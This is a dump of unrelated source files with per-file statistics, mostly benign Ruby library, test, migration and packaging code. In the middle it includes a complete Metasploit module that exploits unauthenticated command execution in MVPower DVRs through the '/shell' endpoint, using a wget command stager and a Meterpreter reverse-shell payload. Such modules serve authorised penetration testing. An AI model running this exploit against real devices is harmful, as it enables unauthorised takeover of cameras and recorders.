end | 11.5 | 18 | 0.637681 |
e20df49c3500c5d4de40f00838176f11fbbf8cb2 | 2,015 | require "spec_helper"
describe "routing for people", type: :routing do
before(:each) do
@community = FactoryGirl.create(:community)
@protocol_and_host = "http://#{@community.ident}.test.host"
@person = FactoryGirl.create(:person)
end
it "routes /:username to people controller" do
expect(get "/#{@person.username}").to(
route_to(
{
:controller => "people",
:action => "show",
:id => @person.username
}
)
)
end
it "routes /:username/settings to settings controller" do
expect(get "/#{@person.username}/settings").to(
route_to(
{
:controller => "settings",
:action => "show",
:person_id => @person.username
}
)
)
end
it "routes /en to login page" do
expect(get "#{@protocol_and_host}/en").to(
route_to({
:controller => "sessions",
:action => "new",
:locale => "en"
}))
end
it "routes /pt-BR to login page" do
expect(get "/pt-BR").to(
route_to({
:controller => "sessions",
:action => "new",
:locale => "pt-BR"
}))
end
it "routes / to login page" do
expect(get "/").to(
route_to({
:controller => "sessions",
:action => "new"
}))
end
it "routes /login to login" do
expect(get "/login").to(
route_to({
:controller => "sessions",
:action => "new"
}))
end
it "routes /logout to logout" do
expect(get "/logout").to(
route_to({
:controller => "sessions",
:action => "destroy"
}))
end
it "routes /en/login to login" do
expect(get "/en/login").to(
route_to({
:controller => "sessions",
:action => "new",
:locale => "en"
}))
end
end
| 23.430233 | 63 | 0.466005 |
1dee09318660904923d82a64d33ec64b913c8058 | 138 | class FixTypeOnItem < ActiveRecord::Migration[5.1]
def change
rename_column :items, :rejection_resason, :rejection_reason
end
end
| 23 | 63 | 0.775362 |
5dd6208599444eb006e8a9cf00b122002e98a642 | 1,729 | # Generated by jeweler
# DO NOT EDIT THIS FILE DIRECTLY
# Instead, edit Jeweler::Tasks in Rakefile, and run 'rake gemspec'
# -*- encoding: utf-8 -*-
Gem::Specification.new do |s|
s.name = %q{ruby-encoding-wrapper}
s.version = "0.1.0"
s.required_rubygems_version = Gem::Requirement.new(">= 0") if s.respond_to? :required_rubygems_version=
s.authors = ["Mikhailov Anatoly", "Tsech Edward", "Anton Zaytsev"]
s.date = %q{2011-07-03}
s.description = %q{Simple wrapper for encoding.com API based on ruby.}
s.email = %q{[email protected]}
s.extra_rdoc_files = [
"README"
]
s.files = [
"Gemfile",
"Gemfile.lock",
"MIT-LICENSE",
"README",
"Rakefile",
"VERSION",
"init.rb",
"install.rb",
"lib/encoding_wrapper.rb",
"lib/encoding_wrapper/queue.rb",
"ruby-encoding-wrapper.gemspec",
"test/test.rb",
"test/test_list.rb",
"uninstall.rb"
]
s.homepage = %q{https://github.com/mikhailov/ruby-encoding-wrapper}
s.require_paths = ["lib"]
s.rubygems_version = %q{1.6.2}
s.summary = nil
if s.respond_to? :specification_version then
s.specification_version = 3
if Gem::Version.new(Gem::VERSION) >= Gem::Version.new('1.2.0') then
s.add_runtime_dependency(%q<nokogiri>, ["~> 1.6.0"])
s.add_development_dependency(%q<bundler>, ["~> 1.2.0"])
s.add_development_dependency(%q<jeweler>, ["~> 1.6.3"])
else
s.add_dependency(%q<nokogiri>, ["~> 1.6.0"])
s.add_dependency(%q<bundler>, ["~> 1.2.0"])
s.add_dependency(%q<jeweler>, ["~> 1.6.3"])
end
else
s.add_dependency(%q<nokogiri>, ["~> 1.6.0"])
s.add_dependency(%q<bundler>, ["~> 1.2.0"])
s.add_dependency(%q<jeweler>, ["~> 1.6.3"])
end
end
| 29.810345 | 105 | 0.625217 |
1884dcba2461b084f567f916d1229cd13e14b926 | 20,162 | # Copyright 2015 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
require_relative 'active_call'
require_relative '../version'
# GRPC contains the General RPC module.
module GRPC
# rubocop:disable Metrics/ParameterLists
# ClientStub represents a client connection to a gRPC server, and can be used
# to send requests.
class ClientStub
include Core::StatusCodes
include Core::TimeConsts
# Default timeout is infinity.
DEFAULT_TIMEOUT = INFINITE_FUTURE
# setup_channel is used by #initialize to constuct a channel from its
# arguments.
def self.setup_channel(alt_chan, host, creds, channel_args = {})
unless alt_chan.nil?
fail(TypeError, '!Channel') unless alt_chan.is_a?(Core::Channel)
return alt_chan
end
if channel_args['grpc.primary_user_agent'].nil?
channel_args['grpc.primary_user_agent'] = ''
else
channel_args['grpc.primary_user_agent'] += ' '
end
channel_args['grpc.primary_user_agent'] += "grpc-ruby/#{VERSION}"
unless creds.is_a?(Core::ChannelCredentials) || creds.is_a?(Symbol)
fail(TypeError, '!ChannelCredentials or Symbol')
end
Core::Channel.new(host, channel_args, creds)
end
# Allows users of the stub to modify the propagate mask.
#
# This is an advanced feature for use when making calls to another gRPC
# server whilst running in the handler of an existing one.
attr_writer :propagate_mask
# Creates a new ClientStub.
#
# Minimally, a stub is created with the just the host of the gRPC service
# it wishes to access, e.g.,
#
# my_stub = ClientStub.new(example.host.com:50505,
# :this_channel_is_insecure)
#
# If a channel_override argument is passed, it will be used as the
# underlying channel. Otherwise, the channel_args argument will be used
# to construct a new underlying channel.
#
# There are some specific keyword args that are not used to configure the
# channel:
#
# - :channel_override
# when present, this must be a pre-created GRPC::Core::Channel. If it's
# present the host and arbitrary keyword arg areignored, and the RPC
# connection uses this channel.
#
# - :timeout
# when present, this is the default timeout used for calls
#
# @param host [String] the host the stub connects to
# @param creds [Core::ChannelCredentials|Symbol] the channel credentials, or
# :this_channel_is_insecure, which explicitly indicates that the client
# should be created with an insecure connection. Note: this argument is
# ignored if the channel_override argument is provided.
# @param channel_override [Core::Channel] a pre-created channel
# @param timeout [Number] the default timeout to use in requests
# @param propagate_mask [Number] A bitwise combination of flags in
# GRPC::Core::PropagateMasks. Indicates how data should be propagated
# from parent server calls to child client calls if this client is being
# used within a gRPC server.
# @param channel_args [Hash] the channel arguments. Note: this argument is
# ignored if the channel_override argument is provided.
# @param interceptors [Array<GRPC::ClientInterceptor>] An array of
# GRPC::ClientInterceptor objects that will be used for
# intercepting calls before they are executed
# Interceptors are an EXPERIMENTAL API.
def initialize(host, creds,
channel_override: nil,
timeout: nil,
propagate_mask: nil,
channel_args: {},
interceptors: [])
@ch = ClientStub.setup_channel(channel_override, host, creds,
channel_args.dup)
alt_host = channel_args[Core::Channel::SSL_TARGET]
@host = alt_host.nil? ? host : alt_host
@propagate_mask = propagate_mask
@timeout = timeout.nil? ? DEFAULT_TIMEOUT : timeout
@interceptors = InterceptorRegistry.new(interceptors)
end
# request_response sends a request to a GRPC server, and returns the
# response.
#
# == Flow Control ==
# This is a blocking call.
#
# * it does not return until a response is received.
#
# * the requests is sent only when GRPC core's flow control allows it to
# be sent.
#
# == Errors ==
# An RuntimeError is raised if
#
# * the server responds with a non-OK status
#
# * the deadline is exceeded
#
# == Return Value ==
#
# If return_op is false, the call returns the response
#
# If return_op is true, the call returns an Operation, calling execute
# on the Operation returns the response.
#
# @param method [String] the RPC method to call on the GRPC server
# @param req [Object] the request sent to the server
# @param marshal [Function] f(obj)->string that marshals requests
# @param unmarshal [Function] f(string)->obj that unmarshals responses
# @param deadline [Time] (optional) the time the request should complete
# @param return_op [true|false] return an Operation if true
# @param parent [Core::Call] a prior call whose reserved metadata
# will be propagated by this one.
# @param credentials [Core::CallCredentials] credentials to use when making
# the call
# @param metadata [Hash] metadata to be sent to the server
# @return [Object] the response received from the server
def request_response(method, req, marshal, unmarshal,
deadline: nil,
return_op: false,
parent: nil,
credentials: nil,
metadata: {})
c = new_active_call(method, marshal, unmarshal,
deadline: deadline,
parent: parent,
credentials: credentials)
interception_context = @interceptors.build_context
intercept_args = {
method: method,
request: req,
call: c.interceptable,
metadata: metadata
}
if return_op
# return the operation view of the active_call; define #execute as a
# new method for this instance that invokes #request_response.
c.merge_metadata_to_send(metadata)
op = c.operation
op.define_singleton_method(:execute) do
interception_context.intercept!(:request_response, intercept_args) do
c.request_response(req, metadata: metadata)
end
end
op
else
interception_context.intercept!(:request_response, intercept_args) do
c.request_response(req, metadata: metadata)
end
end
end
# client_streamer sends a stream of requests to a GRPC server, and
# returns a single response.
#
# requests provides an 'iterable' of Requests. I.e. it follows Ruby's
# #each enumeration protocol. In the simplest case, requests will be an
# array of marshallable objects; in typical case it will be an Enumerable
# that allows dynamic construction of the marshallable objects.
#
# == Flow Control ==
# This is a blocking call.
#
# * it does not return until a response is received.
#
# * each requests is sent only when GRPC core's flow control allows it to
# be sent.
#
# == Errors ==
# An RuntimeError is raised if
#
# * the server responds with a non-OK status
#
# * the deadline is exceeded
#
# == Return Value ==
#
# If return_op is false, the call consumes the requests and returns
# the response.
#
# If return_op is true, the call returns the response.
#
# @param method [String] the RPC method to call on the GRPC server
# @param requests [Object] an Enumerable of requests to send
# @param marshal [Function] f(obj)->string that marshals requests
# @param unmarshal [Function] f(string)->obj that unmarshals responses
# @param deadline [Time] (optional) the time the request should complete
# @param return_op [true|false] return an Operation if true
# @param parent [Core::Call] a prior call whose reserved metadata
# will be propagated by this one.
# @param credentials [Core::CallCredentials] credentials to use when making
# the call
# @param metadata [Hash] metadata to be sent to the server
# @return [Object|Operation] the response received from the server
def client_streamer(method, requests, marshal, unmarshal,
deadline: nil,
return_op: false,
parent: nil,
credentials: nil,
metadata: {})
c = new_active_call(method, marshal, unmarshal,
deadline: deadline,
parent: parent,
credentials: credentials)
interception_context = @interceptors.build_context
intercept_args = {
method: method,
requests: requests,
call: c.interceptable,
metadata: metadata
}
if return_op
# return the operation view of the active_call; define #execute as a
# new method for this instance that invokes #client_streamer.
c.merge_metadata_to_send(metadata)
op = c.operation
op.define_singleton_method(:execute) do
interception_context.intercept!(:client_streamer, intercept_args) do
c.client_streamer(requests)
end
end
op
else
interception_context.intercept!(:client_streamer, intercept_args) do
c.client_streamer(requests, metadata: metadata)
end
end
end
# server_streamer sends one request to the GRPC server, which yields a
# stream of responses.
#
# responses provides an enumerator over the streamed responses, i.e. it
# follows Ruby's #each iteration protocol. The enumerator blocks while
# waiting for each response, stops when the server signals that no
# further responses will be supplied. If the implicit block is provided,
# it is executed with each response as the argument and no result is
# returned.
#
# == Flow Control ==
# This is a blocking call.
#
# * the request is sent only when GRPC core's flow control allows it to
# be sent.
#
# * the request will not complete until the server sends the final
# response followed by a status message.
#
# == Errors ==
# An RuntimeError is raised if
#
# * the server responds with a non-OK status when any response is
# * retrieved
#
# * the deadline is exceeded
#
# == Return Value ==
#
# if the return_op is false, the return value is an Enumerator of the
# results, unless a block is provided, in which case the block is
# executed with each response.
#
# if return_op is true, the function returns an Operation whose #execute
# method runs server streamer call. Again, Operation#execute either
# calls the given block with each response or returns an Enumerator of the
# responses.
#
# == Keyword Args ==
#
# Unspecified keyword arguments are treated as metadata to be sent to the
# server.
#
# @param method [String] the RPC method to call on the GRPC server
# @param req [Object] the request sent to the server
# @param marshal [Function] f(obj)->string that marshals requests
# @param unmarshal [Function] f(string)->obj that unmarshals responses
# @param deadline [Time] (optional) the time the request should complete
# @param return_op [true|false]return an Operation if true
# @param parent [Core::Call] a prior call whose reserved metadata
# will be propagated by this one.
# @param credentials [Core::CallCredentials] credentials to use when making
# the call
# @param metadata [Hash] metadata to be sent to the server
# @param blk [Block] when provided, is executed for each response
# @return [Enumerator|Operation|nil] as discussed above
def server_streamer(method, req, marshal, unmarshal,
deadline: nil,
return_op: false,
parent: nil,
credentials: nil,
metadata: {},
&blk)
c = new_active_call(method, marshal, unmarshal,
deadline: deadline,
parent: parent,
credentials: credentials)
interception_context = @interceptors.build_context
intercept_args = {
method: method,
request: req,
call: c.interceptable,
metadata: metadata
}
if return_op
# return the operation view of the active_call; define #execute
# as a new method for this instance that invokes #server_streamer
c.merge_metadata_to_send(metadata)
op = c.operation
op.define_singleton_method(:execute) do
interception_context.intercept!(:server_streamer, intercept_args) do
c.server_streamer(req, &blk)
end
end
op
else
interception_context.intercept!(:server_streamer, intercept_args) do
c.server_streamer(req, metadata: metadata, &blk)
end
end
end
# bidi_streamer sends a stream of requests to the GRPC server, and yields
# a stream of responses.
#
# This method takes an Enumerable of requests, and returns and enumerable
# of responses.
#
# == requests ==
#
# requests provides an 'iterable' of Requests. I.e. it follows Ruby's
# #each enumeration protocol. In the simplest case, requests will be an
# array of marshallable objects; in typical case it will be an
# Enumerable that allows dynamic construction of the marshallable
# objects.
#
# == responses ==
#
# This is an enumerator of responses. I.e, its #next method blocks
# waiting for the next response. Also, if at any point the block needs
# to consume all the remaining responses, this can be done using #each or
# #collect. Calling #each or #collect should only be done if
# the_call#writes_done has been called, otherwise the block will loop
# forever.
#
# == Flow Control ==
# This is a blocking call.
#
# * the call completes when the next call to provided block returns
# false
#
# * the execution block parameters are two objects for sending and
# receiving responses, each of which blocks waiting for flow control.
# E.g, calles to bidi_call#remote_send will wait until flow control
# allows another write before returning; and obviously calls to
# responses#next block until the next response is available.
#
# == Termination ==
#
# As well as sending and receiving messages, the block passed to the
# function is also responsible for:
#
# * calling bidi_call#writes_done to indicate no further reqs will be
# sent.
#
# * returning false if once the bidi stream is functionally completed.
#
# Note that response#next will indicate that there are no further
# responses by throwing StopIteration, but can only happen either
# if bidi_call#writes_done is called.
#
# To properly terminate the RPC, the responses should be completely iterated
# through; one way to do this is to loop on responses#next until no further
# responses are available.
#
# == Errors ==
# An RuntimeError is raised if
#
# * the server responds with a non-OK status when any response is
# * retrieved
#
# * the deadline is exceeded
#
#
# == Return Value ==
#
# if the return_op is false, the return value is an Enumerator of the
# results, unless a block is provided, in which case the block is
# executed with each response.
#
# if return_op is true, the function returns an Operation whose #execute
# method runs the Bidi call. Again, Operation#execute either calls a
# given block with each response or returns an Enumerator of the
# responses.
#
# @param method [String] the RPC method to call on the GRPC server
# @param requests [Object] an Enumerable of requests to send
# @param marshal [Function] f(obj)->string that marshals requests
# @param unmarshal [Function] f(string)->obj that unmarshals responses
# @param deadline [Time] (optional) the time the request should complete
# @param return_op [true|false] return an Operation if true
# @param parent [Core::Call] a prior call whose reserved metadata
# will be propagated by this one.
# @param credentials [Core::CallCredentials] credentials to use when making
# the call
# @param metadata [Hash] metadata to be sent to the server
# @param blk [Block] when provided, is executed for each response
# @return [Enumerator|nil|Operation] as discussed above
def bidi_streamer(method, requests, marshal, unmarshal,
deadline: nil,
return_op: false,
parent: nil,
credentials: nil,
metadata: {},
&blk)
c = new_active_call(method, marshal, unmarshal,
deadline: deadline,
parent: parent,
credentials: credentials)
interception_context = @interceptors.build_context
intercept_args = {
method: method,
requests: requests,
call: c.interceptable,
metadata: metadata
}
if return_op
# return the operation view of the active_call; define #execute
# as a new method for this instance that invokes #bidi_streamer
c.merge_metadata_to_send(metadata)
op = c.operation
op.define_singleton_method(:execute) do
interception_context.intercept!(:bidi_streamer, intercept_args) do
c.bidi_streamer(requests, &blk)
end
end
op
else
interception_context.intercept!(:bidi_streamer, intercept_args) do
c.bidi_streamer(requests, metadata: metadata, &blk)
end
end
end
private
# Creates a new active stub
#
# @param method [string] the method being called.
# @param marshal [Function] f(obj)->string that marshals requests
# @param unmarshal [Function] f(string)->obj that unmarshals responses
# @param parent [Grpc::Call] a parent call, available when calls are
# made from server
# @param credentials [Core::CallCredentials] credentials to use when making
# the call
def new_active_call(method, marshal, unmarshal,
deadline: nil,
parent: nil,
credentials: nil)
deadline = from_relative_time(@timeout) if deadline.nil?
# Provide each new client call with its own completion queue
call = @ch.create_call(parent, # parent call
@propagate_mask, # propagation options
method,
nil, # host use nil,
deadline)
call.set_credentials! credentials unless credentials.nil?
ActiveCall.new(call, marshal, unmarshal, deadline,
started: false)
end
end
end
| 40.163347 | 80 | 0.63947 |
bbb100de21ed35b547e9a1d183acae43d6eb84b1 | 1,299 | # -*- encoding: utf-8 -*-
# stub: equalizer 0.0.11 ruby lib
Gem::Specification.new do |s|
s.name = "equalizer"
s.version = "0.0.11"
s.required_rubygems_version = Gem::Requirement.new(">= 0") if s.respond_to? :required_rubygems_version=
s.require_paths = ["lib"]
s.authors = ["Dan Kubb", "Markus Schirp"]
s.date = "2015-03-23"
s.description = "Module to define equality, equivalence and inspection methods"
s.email = ["[email protected]", "[email protected]"]
s.extra_rdoc_files = ["LICENSE", "README.md", "CONTRIBUTING.md"]
s.files = ["CONTRIBUTING.md", "LICENSE", "README.md"]
s.homepage = "https://github.com/dkubb/equalizer"
s.licenses = ["MIT"]
s.required_ruby_version = Gem::Requirement.new(">= 1.8.7")
s.rubygems_version = "2.4.5"
s.summary = "Module to define equality, equivalence and inspection methods"
s.installed_by_version = "2.4.5" if s.respond_to? :installed_by_version
if s.respond_to? :specification_version then
s.specification_version = 4
if Gem::Version.new(Gem::VERSION) >= Gem::Version.new('1.2.0') then
s.add_development_dependency(%q<bundler>, [">= 1.3.5", "~> 1.3"])
else
s.add_dependency(%q<bundler>, [">= 1.3.5", "~> 1.3"])
end
else
s.add_dependency(%q<bundler>, [">= 1.3.5", "~> 1.3"])
end
end
| 36.083333 | 105 | 0.656659 |
e2f142f3090a6357c00ef72eaeb4fe590ef9ae2e | 3,201 | ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
HttpFingerprint = { :pattern => [ /JAWS\/1\.0/ ] }
def initialize(info = {})
super(update_info(info,
'Name' => 'MVPower DVR Shell Unauthenticated Command Execution',
'Description' => %q{
This module exploits an unauthenticated remote command execution
vulnerability in MVPower digital video recorders. The 'shell' file
on the web interface executes arbitrary operating system commands in
the query string.
This module was tested successfully on a MVPower model TV-7104HE with
firmware version 1.8.4 115215B9 (Build 2014/11/17).
The TV-7108HE model is also reportedly affected, but untested.
},
'Author' =>
[
'Paul Davies (UHF-Satcom)', # Initial vulnerability discovery and PoC
'Andrew Tierney (Pen Test Partners)', # Independent vulnerability discovery and PoC
'bcoles' # Metasploit
],
'License' => MSF_LICENSE,
'Platform' => 'linux',
'References' =>
[
# Comment from Paul Davies contains probably the first published PoC
[ 'URL', 'https://labby.co.uk/cheap-dvr-teardown-and-pinout-mvpower-hi3520d_v1-95p/' ],
# Writeup with PoC by Andrew Tierney from Pen Test Partners
[ 'URL', 'https://www.pentestpartners.com/blog/pwning-cctv-cameras/' ]
],
'DisclosureDate' => '2015-08-23',
'Privileged' => true, # BusyBox
'Arch' => ARCH_ARMLE,
'DefaultOptions' =>
{
'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp',
'CMDSTAGER::FLAVOR' => 'wget'
},
'Targets' =>
[
['Automatic', {}]
],
'CmdStagerFlavor' => %w{ echo printf wget },
'DefaultTarget' => 0))
end
def check
begin
fingerprint = Rex::Text::rand_text_alpha(rand(10) + 6)
res = send_request_cgi(
'method' => 'GET',
'uri' => '/shell',
'query' => "echo+#{fingerprint}",
'headers' => { 'Connection' => 'Keep-Alive' }
)
if res && res.body.include?(fingerprint)
return CheckCode::Vulnerable
end
rescue ::Rex::ConnectionError
return CheckCode::Unknown
end
CheckCode::Safe
end
def execute_command(cmd, opts)
begin
send_request_cgi(
'uri' => '/shell',
'query' => Rex::Text.uri_encode(cmd, 'hex-all'),
'headers' => { 'Connection' => 'Keep-Alive' }
)
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
end
end
def exploit
print_status("#{peer} - Connecting to target")
unless check == CheckCode::Vulnerable
fail_with(Failure::Unknown, "#{peer} - Target is not vulnerable")
end
print_good("#{peer} - Target is vulnerable!")
execute_cmdstager(linemax: 1500)
end
end
| 31.693069 | 97 | 0.601687 |
1a7c6775f0920ca032b53de417f88565d82d667e | 790 | #
# This class was auto-generated from the API references found at
# https://epayments-api.developer-ingenico.com/s2sapi/v1/
#
require 'ingenico/connect/sdk/data_object'
module Ingenico::Connect::SDK
module Domain
module Payment
# @attr [String] merchant_reference
class OrderReferencesApprovePayment < Ingenico::Connect::SDK::DataObject
attr_accessor :merchant_reference
# @return (Hash)
def to_h
hash = super
hash['merchantReference'] = @merchant_reference unless @merchant_reference.nil?
hash
end
def from_hash(hash)
super
if hash.has_key? 'merchantReference'
@merchant_reference = hash['merchantReference']
end
end
end
end
end
end
| 23.939394 | 89 | 0.64557 |
f87bec928b4ecb290681613257f152eca83f10d4 | 662 | class Api::V1::CollectionsController < ApplicationController
def index
collections = Collection.all
render json: CollectionSerializer.new(collections)
end
def create
collection = Collection.new(collection_params)
if collection.save
render json: CollectionSerializer.new(collection), status: :accepted
else
render json: {errors: collection.errors.full_messages}, status: :unprocessable_entity
end
end
def show
collection = Collection.find(params[:id])
render json: CollectionSerializer.new(collection)
end
private
def collection_params
params.require(:collection).permit(:name)
end
end | 24.518519 | 91 | 0.732628 |
082561fd400c96449d2f11da7811969cdde16faa | 5,607 | class Puppet::Parser::AST
# The base class for all of the leaves of the parse trees. These
# basically just have types and values. Both of these parameters
# are simple values, not AST objects.
class Leaf < AST
attr_accessor :value, :type
# Return our value.
def evaluate(scope)
@value
end
def match(value)
@value == value
end
def to_s
@value.to_s unless @value.nil?
end
end
# The boolean class. True or false. Converts the string it receives
# to a Ruby boolean.
class Boolean < AST::Leaf
# Use the parent method, but then convert to a real boolean.
def initialize(hash)
super
unless @value == true or @value == false
raise Puppet::DevError,
"'#{@value}' is not a boolean"
end
@value
end
def to_s
@value ? "true" : "false"
end
end
# The base string class.
class String < AST::Leaf
def evaluate(scope)
@value.dup
end
def to_s
"\"#{@value}\""
end
end
# An uninterpreted string.
class FlatString < AST::Leaf
def evaluate(scope)
@value
end
def to_s
"\"#{@value}\""
end
end
class Concat < AST::Leaf
def evaluate(scope)
@value.collect { |x| x.evaluate(scope) }.collect{ |x| x == :undef ? '' : x }.join
end
def to_s
"#{@value.map { |s| s.to_s.gsub(/^"(.*)"$/, '\1') }.join}"
end
end
# The 'default' option on case statements and selectors.
class Default < AST::Leaf; end
# Capitalized words; used mostly for type-defaults, but also
# get returned by the lexer any other time an unquoted capitalized
# word is found.
class Type < AST::Leaf; end
# Lower-case words.
class Name < AST::Leaf; end
# double-colon separated class names
class ClassName < AST::Leaf; end
# undef values; equiv to nil
class Undef < AST::Leaf; end
# Host names, either fully qualified or just the short name, or even a regex
class HostName < AST::Leaf
def initialize(hash)
super
# Note that this is an AST::Regex, not a Regexp
@value = @value.to_s.downcase unless @value.is_a?(Regex)
if @value =~ /[^-\w.]/
raise Puppet::DevError,
"'#{@value}' is not a valid hostname"
end
end
# implementing eql? and hash so that when an HostName is stored
# in a hash it has the same hashing properties as the underlying value
def eql?(value)
value = value.value if value.is_a?(HostName)
@value.eql?(value)
end
def hash
@value.hash
end
def to_s
@value.to_s
end
end
# A simple variable. This object is only used during interpolation;
# the VarDef class is used for assignment.
class Variable < Name
# Looks up the value of the object in the scope tree (does
# not include syntactical constructs, like '$' and '{}').
def evaluate(scope)
parsewrap do
if (var = scope.lookupvar(@value, :file => file, :line => line)) == :undefined
var = :undef
end
var
end
end
def to_s
"\$#{value}"
end
end
class HashOrArrayAccess < AST::Leaf
attr_accessor :variable, :key
def evaluate_container(scope)
container = variable.respond_to?(:evaluate) ? variable.safeevaluate(scope) : variable
(container.is_a?(Hash) or container.is_a?(Array)) ? container : scope.lookupvar(container, :file => file, :line => line)
end
def evaluate_key(scope)
key.respond_to?(:evaluate) ? key.safeevaluate(scope) : key
end
def array_index_or_key(object, key)
if object.is_a?(Array)
raise Puppet::ParserError, "#{key} is not an integer, but is used as an index of an array" unless key = Puppet::Parser::Scope.number?(key)
end
key
end
def evaluate(scope)
object = evaluate_container(scope)
accesskey = evaluate_key(scope)
raise Puppet::ParseError, "#{variable} is not an hash or array when accessing it with #{accesskey}" unless object.is_a?(Hash) or object.is_a?(Array)
object[array_index_or_key(object, accesskey)] || :undef
end
# Assign value to this hashkey or array index
def assign(scope, value)
object = evaluate_container(scope)
accesskey = evaluate_key(scope)
if object.is_a?(Hash) and object.include?(accesskey)
raise Puppet::ParseError, "Assigning to the hash '#{variable}' with an existing key '#{accesskey}' is forbidden"
end
# assign to hash or array
object[array_index_or_key(object, accesskey)] = value
end
def to_s
"\$#{variable.to_s}[#{key.to_s}]"
end
end
class Regex < AST::Leaf
def initialize(hash)
super
@value = Regexp.new(@value) unless @value.is_a?(Regexp)
end
# we're returning self here to wrap the regexp and to be used in places
# where a string would have been used, without modifying any client code.
# For instance, in many places we have the following code snippet:
# val = @val.safeevaluate(@scope)
# if val.match(otherval)
# ...
# end
# this way, we don't have to modify this test specifically for handling
# regexes.
def evaluate(scope)
self
end
def evaluate_match(value, scope, options = {})
value = value == :undef ? '' : value.to_s
if matched = @value.match(value)
scope.ephemeral_from(matched, options[:file], options[:line])
end
matched
end
def match(value)
@value.match(value)
end
def to_s
"/#{@value.source}/"
end
end
end
| 25.256757 | 154 | 0.623328 |
398477a680ebc77e882352ae01e9fa21b5e93a0e | 1,341 | require 'spec_helper'
RSpec.describe 'Coinexmarket integration specs' do
let(:client) { Cryptoexchange::Client.new }
let(:btc_ltc_pair) { Cryptoexchange::Models::MarketPair.new(base: 'btc', target: 'ltc', market: 'coinexmarket') }
it 'fetch pairs' do
pairs = client.pairs('coinexmarket')
expect(pairs).not_to be_empty
pair = pairs.first
expect(pair.base).to_not be nil
expect(pair.target).to_not be nil
expect(pair.market).to eq 'coinexmarket'
end
it 'fetch ticker' do
ticker = client.ticker(btc_ltc_pair)
expect(ticker.base).to eq 'BTC'
expect(ticker.target).to eq 'LTC'
expect(ticker.market).to eq 'coinexmarket'
expect(ticker.last).to be_a Numeric
expect(ticker.volume).to be_a Numeric
expect(ticker.timestamp).to be nil
expect(ticker.payload).to_not be nil
end
it 'fetch order book' do
order_book = client.order_book(btc_ltc_pair)
expect(order_book.base).to eq 'BTC'
expect(order_book.target).to eq 'LTC'
expect(order_book.market).to eq 'coinexmarket'
expect(order_book.asks).to_not be_empty
expect(order_book.bids).to_not be_empty
expect(order_book.asks.first).to_not be_nil
expect(order_book.bids.first).to_not be_nil
expect(order_book.timestamp).to be_a Numeric
expect(order_book.payload).to_not be nil
end
end
| 31.186047 | 115 | 0.716629 |
ede75b81cf0efb33cdfbaf146b5adc9233ff6c89 | 974 | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: google/ads/googleads/v3/errors/id_error.proto
require 'google/protobuf'
require 'google/api/annotations_pb'
Google::Protobuf::DescriptorPool.generated_pool.build do
add_file("google/ads/googleads/v3/errors/id_error.proto", :syntax => :proto3) do
add_message "google.ads.googleads.v3.errors.IdErrorEnum" do
end
add_enum "google.ads.googleads.v3.errors.IdErrorEnum.IdError" do
value :UNSPECIFIED, 0
value :UNKNOWN, 1
value :NOT_FOUND, 2
end
end
end
module Google
module Ads
module GoogleAds
module V3
module Errors
IdErrorEnum = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.ads.googleads.v3.errors.IdErrorEnum").msgclass
IdErrorEnum::IdError = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.ads.googleads.v3.errors.IdErrorEnum.IdError").enummodule
end
end
end
end
end
| 31.419355 | 154 | 0.725873 |
d51e11c98e6a9be21f839c31cdce29c0444964f6 | 233 | class Group < ActiveRecord::Base
validates_presence_of :name
has_many :item_groups
has_many :items, through: :item_groups
has_many :users, through: :items
extend Slugify::ClassMethods
include Slugify::InstanceMethods
end
| 25.888889 | 40 | 0.785408 |
b9ff123dbccbb116475c32da1da1523723720e29 | 135 | class AddCategoryIdToProposals < ActiveRecord::Migration[5.0]
def change
add_column :proposals, :category_id, :integer
end
end
| 22.5 | 61 | 0.77037 |
e82bf111b19c3f1ce2e2832e2a67f8a9eb599412 | 158 | require File.expand_path('../../../spec_helper', __FILE__)
require 'actor'
describe "Actor.receive" do
it "needs to be reviewed for spec completeness"
end
| 22.571429 | 58 | 0.734177 |
bfe7bcbee4c10cb77d12dc8ac834064ca0103379 | 828 | # frozen_string_literal: true
class CreateSubmissions < ActiveRecord::Migration[5.0]
def change
create_table :submissions do |t|
t.string :user_id, index: true
t.boolean :qualified
t.string :artist_id
t.string :title
t.string :medium
t.string :year
t.string :category
t.string :height
t.string :width
t.string :depth
t.string :dimensions_metric
t.boolean :signature
t.boolean :authenticity_certificate
t.text :provenance
t.string :location_city
t.string :location_state
t.string :location_country
t.date :deadline_to_sell
t.text :additional_info
t.timestamps
end
create_table :assets do |t|
t.string :asset_type
t.string :gemini_token
t.string :image_urls
end
end
end
| 23.657143 | 54 | 0.650966 |
5d780a24f856f2e58a74258c07d6601482986978 | 1,745 | class GitAbsorb < Formula
desc "Automatic git commit --fixup"
homepage "https://github.com/tummychow/git-absorb"
url "https://github.com/tummychow/git-absorb/archive/0.6.6.tar.gz"
sha256 "955069cc70a34816e6f4b6a6bd1892cfc0ae3d83d053232293366eb65599af2f"
license "BSD-3-Clause"
bottle do
rebuild 1
sha256 cellar: :any_skip_relocation, arm64_big_sur: "50ec784cd0089d5840025d2b108ac75b9b87b4ec786e9e4766304fc012cb3507"
sha256 cellar: :any_skip_relocation, big_sur: "5c90abd3d3058854758851749660bab97f06a9b60b01e6eb75da29c3c6fa3941"
sha256 cellar: :any_skip_relocation, catalina: "0d9b836c7c18d1284e31fe6d354cbfae95c513fae6855d7d8897dbaab3eacf0e"
sha256 cellar: :any_skip_relocation, mojave: "d5f13b0f733d6c2d1cd8c98008fcf51faccd3bd4312dd7742dc6a2cc695d0a34"
end
depends_on "rust" => :build
uses_from_macos "zlib"
def install
system "cargo", "install", *std_cargo_args
man1.install "Documentation/git-absorb.1"
